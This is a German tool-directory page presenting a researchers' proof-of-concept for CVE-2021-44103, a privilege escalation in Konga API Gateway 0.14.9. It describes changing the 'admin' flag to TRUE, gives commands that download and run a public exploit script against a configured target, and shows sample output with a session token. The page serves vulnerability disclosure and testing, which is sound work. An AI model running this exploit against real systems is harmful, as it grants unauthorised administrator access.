Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44103 — Proof-of-Concept-Exploit für CVE-2021-44103, der eine vertikale Privilegieneskalation in Konga API Gateway 0.14.9 demonstriert und es authentifizierten Benutzern ermöglicht, Administratorzugriff zu erlangen. | Kitploit
Tools/GitHubGitHub/paulotrindadec/cve-2021-44103
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAPI-Sicherheit
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

Proof-of-Concept-Exploit für CVE-2021-44103, der eine vertikale Privilegieneskalation in Konga API Gateway 0.14.9 demonstriert und es authentifizierten Benutzern ermöglicht, Administratorzugriff zu erlangen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
35vor 3 JahrenNoch nicht geprüft

CVE-2021-44103

Ein Proof of Concept für KONGA 0.14.9 - Privilegienerweiterung.

Einleitung

Am 16. November 2021 fanden Fabrício Salomão und ich eine Schwachstelle in Konga API Gateways, die es jedem authentifizierten Benutzer ermöglicht, Administrator zu werden.

Gemeldete Schwachstelle

Product: KONGA
Model: 0.14.9
Vulnerability: Privilegienerweiterung
Impact: Voller Admin-Zugriff (vertikale Privilegienerweiterung)
Authentication: erforderlich
Exploit-Autor: Fabricio Salomao / Paulo Trindade

PoC

Unten wurde ein normaler Benutzer namens "usernormal" ohne Privilegien erstellt.

Crash

Crash

Durch die folgende Anfrage wurde das Flag "FALSE" im Parameter "admin" in "TRUE" geändert.

Crash

Daher wurde für uns ein Exploit erstellt: https://www.exploit-db.com/exploits/50521

Crash

Nach dem Ausführen des Exploits war die Privilegienerweiterung erfolgreich!

Ergebnis:

Crash

Ausführen des Exploits

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

Links

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

Tool herunterladen